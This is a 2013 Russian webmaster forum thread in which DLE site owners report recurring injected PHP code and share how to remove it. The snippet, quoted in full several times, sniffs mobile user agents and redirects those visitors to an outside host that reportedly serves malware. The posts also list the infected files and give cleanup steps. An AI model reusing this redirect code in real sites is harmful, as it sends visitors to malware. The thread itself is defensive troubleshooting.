SEO Сообщество: Спрашивайте и помогайте

Присоединяйтесь к сообществу профессиональных веб-мастеров PR-CY, отвечайте на вопросы коллег и задавайте свои.

Зарегистрироваться Войти
Q&A SEO
  1. Сообщество
  2. Вопросы и ответы
  3. Dle - вредоносный код

Dle - вредоносный код

MishaKonsta MishaKonsta  
15
  12.01.2013 23:22       726    
Всем привет! Есть сайт

Кто то льет каждые 3 дня туда такое содержимое:
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
Такой код и главное в одни и те же файлы. engine,init,dbconfig 

Где айфоны, дроиды и тп = проверка на OC.

Заходя с телефона, качает вирусню, вижу такую проблему у многих, никто не знает как справится.


Поставил все последние патчи, сменил данные, все равно атакуют гады, причем в определенное время

0

Ответы на пост (14) Написать ответ
Быстрая регистрация для ответа Войти
Davidov Davidov
1
12.01.2013 23:28
shell залит скорее всего!
0
MIRREXX MIRREXX
0
12.01.2013 23:48
Такая же фигня была....
Удалил, обновил дистрибютив, пока тихо :)
Вот ган*оны!!!
0
DeusVult DeusVult
224
13.01.2013 00:14
Еще один :-) вон лот выше с такими же проблемами :-) :-)
0
vasyev1 vasyev1
96
13.01.2013 00:44
Какая версия DLE? Нет ли вирусов в ПК?
0
MIRREXX MIRREXX
0
13.01.2013 00:45
Кстати, поставил на эти файлы права "444" поможет? :)
0
MIRREXX MIRREXX
0
13.01.2013 00:45
DLE 9.7 последняя
0
maks1991 maks1991
0
13.01.2013 11:59
изменил на новые файлы кроме dbconfig удаляю его сайт тогда не работает удаляю в нем строчку которая появилась та же фигня посоветуйте что сделать
0
MIRREXX MIRREXX
0
13.01.2013 13:33
Должно все работать, покажите что удаляете?
0
MIRREXX MIRREXX
0
13.01.2013 15:48
Ищите еще в "engine.php" и "config.php"
Код такой:
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
Удаляйте!
Вот же козляры!!!
0
maks1991 maks1991
0
13.01.2013 23:21
удалил везде где писали выше. последние удаляю с engine/data/dbconfig.php и у меня не пашет сайт пишет ошибку
0
maks1991 maks1991
0
13.01.2013 23:19
удалил везде где писали выше. последние удаляю с engine/data/dbconfig.php и у меня не пашет сайт пишет ошибку
0
dronn23 dronn23
6
14.01.2013 10:02
Удаляйте именно вот это (в конце скобку не забудьте):

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) { 
header('Location: http://statuses.ws/');
}
У меня этот код был в следующих файлах:
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
0
maligin26 maligin26
0
10.02.2013 17:36
Такая же ситуация на всех сайтах. смотрите еще в файле /language/Russian/website.lng пока поставил 444 на эти файлы.
0
MishaKonsta MishaKonsta
15
01.03.2013 20:13
В 9.8 профиксили
0
Быстрая регистрация для ответа Войти

Похожие посты

Анализ сайта

Поможем улучшить ваш сайт.